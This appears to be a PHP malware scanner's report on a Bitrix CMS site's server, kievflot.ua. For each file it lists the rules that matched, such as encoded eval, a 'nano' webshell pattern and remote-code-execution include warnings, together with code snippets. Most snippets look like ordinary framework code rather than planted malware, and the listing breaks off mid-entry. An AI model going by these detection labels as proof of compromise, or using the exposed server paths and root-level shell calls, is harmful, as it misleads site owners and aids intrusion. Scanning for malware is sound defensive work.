Size: 1.88 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Warns: 3 Dangers: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($command" > ".$outputPath." 2>&1 &"); return true; } public function getLastOutput() { return $this->resOutput; } public function getLastError() { return $this->resError; } public function syncExec($command) { $command $this->prepareExecution($command); $retVal 1$descriptorspec = array( => array("pipe""r"), => array("pipe""w"), => array("pipe""w") ); $pipes = array(); $process proc_open('/bin/bash'$descriptorspec$pipes); if (is_resource($process)) { fwrite($pipes[0...

Function proc_close Line: 93 Warning

Potentially dangerous function `proc_close`

[https://www.php.net/proc_close]

proc_close($process)

Function proc_open Warning

Potentially dangerous function `proc_open`

[https://www.php.net/proc_open]

proc_open('/bin/bash'$descriptorspec$pipes); if (is_resource($process)) { fwrite($pipes[0], $command); fclose($pipes[0]); $this->resOutput stream_get_contents($pipes[1]); fclose($pipes[1]); $this->resError stream_get_contents($pipes[2]); fclose($pipes[2]); $retVal proc_close($process)

Function strrev exec_strrev Line: 39 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/actionsdata.php

Size: 6.54 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$param'$fBody); $result $newfunc($buildParam); } return $result; } public static function setLogLevel($logLevel) { self::$logLevel $logLevel; } public static function checkRunningAction() { $result = array(); $shellAdapter = new ShellAdapter(); $execRes $shellAdapter->syncExec("sudo -u root /opt/webdir/bin/bx-process -a list -o json"); $data $shellAdapter->getLastOutput(); if($execRes) { $arData json_decode($datatrue); $result = array(); if(isset($arData["params"])...

Function strrev exec_strrev Line: 85 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/admin/menu.php

Size: 1.17 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit php_uname Line: 13 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine

php_uname('s')

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lang/ru/include/actionsdefinitions.php

Size: 3.88 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 17 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lang/en/include/actionsdefinitions.php

Size: 2.94 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 17 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/lib/base/controller.php

Size: 12.52 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { try { $this->collectDebugInfo(); $this->resolveAction(); $this->checkAction(); if ($this->prepareParams() && $this->errorCollection->isEmpty() && $this->processBeforeAction($this->getAction()) === true) { $this->runAction(); } $this->logDebugInfo(); } catch(\Exception $e) { $this->errorCollection->add(array(new Error($e->getMessage()))); } if (!$this->errorCollection->isEmpty()) { $this->sendJsonErrorResponse(); } } protected function collectDebugInfo() { if($this->collectDebugInfo) { D...

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/options.php

Size: 4.53 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 33 Warning

Double var technique is usually used for the obfuscation of malicious code

${$name[0]}

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/admin/vote_dialog.php

Size: 1.75 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 26 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/vote/admin/colorpick.htm")

Exploit execution Line: 27 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_after.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/vote_tools.php

Size: 17.63 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 428 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path.$template)

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/install/index.php

Size: 8.21 kB Created: 2017-06-13 15:03:02 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 112 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/vote/install/events/del_events.php")

Exploit execution Line: 137 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/vote/install/events/set_events.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/install/public/tools/vote_chart.php

Size: 448.00 B Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 10 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$file)

/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/install/tools/vote_chart.php

Size: 448.00 B Created: 2017-06-13 15:03:02 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 10 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$file)

/var/www/kievflotq/kievflot.ua/bitrix/modules/asd.iblock/classes/general/iblock_action.php

Size: 30.32 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:51 Dangers: 1
DescriptionMatch

Exploit download_remote_code2 Line: 28 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($hdlOutputCASDiblockTools::ExportPropsToXML($BID$_REQUEST['p'])

/var/www/kievflotq/kievflot.ua/bitrix/modules/asd.iblock/install/index.php

Size: 5.90 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:51 Dangers: 2
DescriptionMatch

Exploit execution Line: 103 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/main/include/prolog_admin_after.php')

Exploit execution Line: 113 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/main/include/epilog_admin.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/search/default_option.php

Size: 714.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign b236d073 Line: 4 Dangerous

Malware Signature (hash: b236d073)

/*;*/

/var/www/kievflotq/kievflot.ua/bitrix/modules/translate/translate_tools.php

Size: 13.14 kB Created: 2017-11-21 16:21:45 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 236 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"] . $f['PATH'])

Exploit execution Line: 355 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].$file)

/var/www/kievflotq/kievflot.ua/bitrix/modules/translate/admin/translate_edit.php

Size: 16.87 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 113 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$fname)

/var/www/kievflotq/kievflot.ua/bitrix/modules/translate/admin/translate_list.php

Size: 19.90 kB Created: 2017-11-21 16:21:45 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 83 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$file)

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/include.php

Size: 86.18 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 2
DescriptionMatch

Exploit double_var2 Line: 2472 Warning

Double var technique is usually used for the obfuscation of malicious code

${$sOrderVar}

Exploit double_var2 Line: 2475 Warning

Double var technique is usually used for the obfuscation of malicious code

${$sOrderVarE}

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/classes/general/forum_new.php

Size: 88.51 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function("&\$item""\$item=intval(\$item);")); $vals array_unique($vals); $val implode(","$vals); } elseif ($type == "double") { array_walk($valscreate_function("&\$item""\$item=doubleval(\$item);")); $vals array_unique($vals); $val implode(","$vals); } elseif ($type == "datetime") { array_walk($valscreate_function("&\$item""\$item=\"'\".\$GLOBALS[\"DB\"]->CharToDateFunction(\$GLOBALS[\"DB\"]->ForSql(\$item), \"FULL\").\"'\";")); $vals array_unique($vals); $val im...

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/mail/mail.php

Size: 20.34 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 649 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/forum/lang/'.$lang.'/mail/mail.php')

Exploit execution Line: 652 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/forum/lang/en/mail/mail.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.rules/lang/en/component.php

Size: 4.71 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Sign 407651f7 Line: 27 Dangerous

Malware Signature (hash: 407651f7)

warez

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.topic.list/component.php

Size: 23.88 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 244 Warning

Double var technique is usually used for the obfuscation of malicious code

${$PAGEN_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.topic.active/component.php

Size: 18.38 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 11 Warning

Double var technique is usually used for the obfuscation of malicious code

${$s}

/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.index/component.php

Size: 18.80 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 111 Warning

Double var technique is usually used for the obfuscation of malicious code

${$PAGEN_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/include/prolog_after.php

Size: 4.52 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 3
DescriptionMatch

Exploit execution Line: 34 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

Exploit execution Line: 75 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$siteClosed)

Exploit execution Line: 83 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/site_closed.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/include/urlrewrite.php

Size: 5.13 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 169 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/admin/404.php")

Exploit execution Line: 59 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT']."/urlrewrite.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/servicemanager.php

Size: 1.95 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit nano Line: 55 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

$obj[1]()

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/mail/eventmessagethemecompiler.php

Size: 10.14 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('use \Bitrix\Main\Mail\EventMessageThemeCompiler; ob_start();?>' $template '<? return ob_get_clean();'); } catch(StopException $e) { ob_clean(); throw $e; } return $result; } protected function addReplaceCallback($identificator$callback) { $this->replaceCallback[$identificator] = $callback; } protected function executeReplaceCallback() { $arReplaceIdentificators = array(); $arReplaceStrings = array(); foreach($this->replaceCallback as $identificator => $callback) { $result call_user...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/data/connectionpool.php

Size: 8.44 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 26 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/modulemanager.php

Size: 2.94 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 54 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$modulePath)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/config/configuration.php

Size: 9.95 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 250 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/cluster/memcache.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/config/option.php

Size: 11.03 kB Created: 2017-11-21 16:20:19 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 133 Warning

Double var technique is usually used for the obfuscation of malicious code

${$varName}

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/ui/fileinputreceiver.php

Size: 6.95 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->getAgent()->checkPost()

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/ui/fileinputunclouder.php

Size: 3.06 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($mode "basic"$params = array()) { $res $this->check($params); if ($this->check($params)) { $this->file = \CFile::getByID($this->id)->fetch(); if ($mode == "resize" && ($file = \CFile::ResizeImageGet($this->id$paramsBX_RESIZE_IMAGE_PROPORTIONALtrue)) && $file) { $this->file["SRC"] = $file["src"]; $this->file["WIDTH"] = $file["width"]; $this->file["HEIGHT"] = $file["height"]; $this->file["FILE_SIZE"] = $file["size"]; } \CFile::ViewByUser($this->file, array("force_download" => fals...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/ui/uploader/uploader.php

Size: 12.91 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('&$v,$k''if($k=="error"){$v=preg_replace("/<(.+?)>/is".BX_UTF_PCRE_MODIFIER, "", $v);}')); return self::removeTmpPath($data); } protected function fillRequireData() { $this->mode $this->getRequest("mode"); if (!in_array($this->mode, array("upload""delete""view"))) throw new ArgumentOutOfRangeException("mode"); if ($this->mode != "view" && !check_bitrix_sessid()) throw new AccessDeniedException("Bad sessid."); $this->version $this->getRequest("version"); $directory = \CB...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/page/asset.php

Size: 58.20 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$matches''return $matches[1].Bitrix\Main\Page\Asset::replaceUrlCSS($matches[3], $matches[2], "'.addslashes($path).'").")";'), $content ); $content preg_replace_callback'#(\s*@import\s*)([\'"])([^\'"]+)(\2)#si'create_function('$matches''return $matches[1].Bitrix\Main\Page\Asset::replaceUrlCSS($matches[3], $matches[2],"'.addslashes($path).'");'), $content ); return $content; } public function groupJs($from ''$to '') { if(empty($from) || empty($to)) { return; } $to ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/entity/base.php

Size: 20.70 kB Created: 2017-11-21 16:20:30 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($eval); $entity self::getInstance($entity_name); foreach ($fieldsMap as $k => $v) { $entity->addField($v$k); } return $entity; } public static function compileEntity($entityName$fields null$parameters = array()) { $classCode ''$classCodeEnd ''; if (strtolower(substr($entityName, -5)) !== 'table') { $entityName .= 'Table'; } if (!preg_match('/^[a-z0-9_]+$/i'$entityName)) { throw new Main\ArgumentException(sprintf'Invalid entity classname `%s`.'$entityName )); } $fullEnt...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/entity/query.php

Size: 75.74 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->is_executing true$query $this->buildQuery(); $cacheId ""$ttl 0$result null; if($this->cacheTtl && (empty($this->join_map) || $this->cacheJoins == true)) { $ttl $this->entity->getCacheTtl($this->cacheTtl); } if($ttl 0) { $cacheId md5($query); $result $this->entity->readFromCache($ttl$cacheId$this->countTotal); } if($result === null) { $result $this->query($query); if($ttl 0) { $result $this->entity->writeToCache($result$cacheId$this->count...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/db/connection.php

Size: 21.29 kB Created: 2017-11-21 16:20:28 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 317 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/eventmanager.php

Size: 12.57 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if ($a["SORT"] == $b["SORT"]) return 0; return ($a["SORT"] < $b["SORT"]) ? -1 : 1;'); foreach (array_keys($handlers) as $moduleId) { foreach (array_keys($handlers[$moduleId]) as $event) { uasort($this->handlers[$moduleId][$event], $funcSort); } } } $this->isHandlersLoaded true; } protected function clearLoadedHandlers() { $managedCache Application::getInstance()->getManagedCache(); $managedCache->clean(self::$cacheKey); foreach($this->handlers as $module=>$types) {...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/composite/responder.php

Size: 18.28 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 650 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/cluster/memcache.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/userconsent/internals/componentcontroller.php

Size: 1.99 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->request Context::getCurrent()->getRequest(); $this->action $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse()

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/userconsent/consent.php

Size: 3.39 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit nano Line: 99 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

$provider['DATA']($originId)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/include.php

Size: 22.67 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Sign 99fc3b9d Line: 101 Dangerous

Malware Signature (hash: 99fc3b9d)

$GLOBALS['____

Sign d97f004d Line: 101 Dangerous

Malware Signature (hash: d97f004d)

ZGVmaW5l

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/component_util.php

Size: 49.31 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Dangers: 6
DescriptionMatch

Exploit execution Line: 1001 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/.parameters.php")

Exploit execution Line: 1099 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolderPath."/".$file1."/.description.php")

Exploit execution Line: 175 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$componentFolder."/".$file."/.description.php")

Exploit execution Line: 244 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$componentFolder."/".$file."/".$file1."/.description.php")

Exploit execution Line: 418 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$componentPath."/.description.php")

Exploit execution Line: 469 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$componentPath."/.parameters.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_b24.php

Size: 9.88 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function syslog Warning

Potentially dangerous function `syslog`

[https://www.php.net/syslog]

syslog(LOG_INFO$_SERVER["HTTP_HOST"]."\tstart\t".$moduleId.$arUpdaters[$i1][0]); CUpdateClient::RunUpdaterScript($this->updatersDir.$moduleId.$arUpdaters[$i1][0], $errorMessageTmp""$moduleId); syslog(LOG_INFO$_SERVER["HTTP_HOST"]."\tend\t".$moduleId.$arUpdaters[$i1][0]."\t".$errorMessageTmp); if (strlen($errorMessageTmp) > 0$errorMessage .= str_replace("#MODULE#"$moduleIdstr_replace("#VER#"$arUpdaters[$i1][1], GetMessage("SUPP_UK_UPDN_ERR"))).": ".$errorMessageTmp."."$this->Col...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/user.php

Size: 138.93 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 4767 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/database.php

Size: 33.13 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 4
DescriptionMatch

Exploit double_var2 Line: 1052 Warning

Double var technique is usually used for the obfuscation of malicious code

${$SHOWALL_NAME}

Exploit execution Line: 133 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/dbconn_error.php")

Exploit execution Line: 135 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/dbconn_error.php")

Exploit execution Line: 229 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/after_connect.php")

Function strrev eval_strrev Line: 35 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_update.php

Size: 89.67 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("DescrDetList_"+sModule));
            
wnd.document.write('</font>');
            
wnd.document.write('\n</body></html>');
        }
        
//-->
        
</script>

        <table border="0" cellspacing="1" cellpadding="2" width="99%">
        <tr>
            <td align="center" class="tablehead1"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DATE"?></font></td>
            <td align="center" class="tablehead2"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DESCR"?></font></td>
            <td align="center" class="tablehead3"><font class="tablehe...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_log.php

Size: 4.71 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

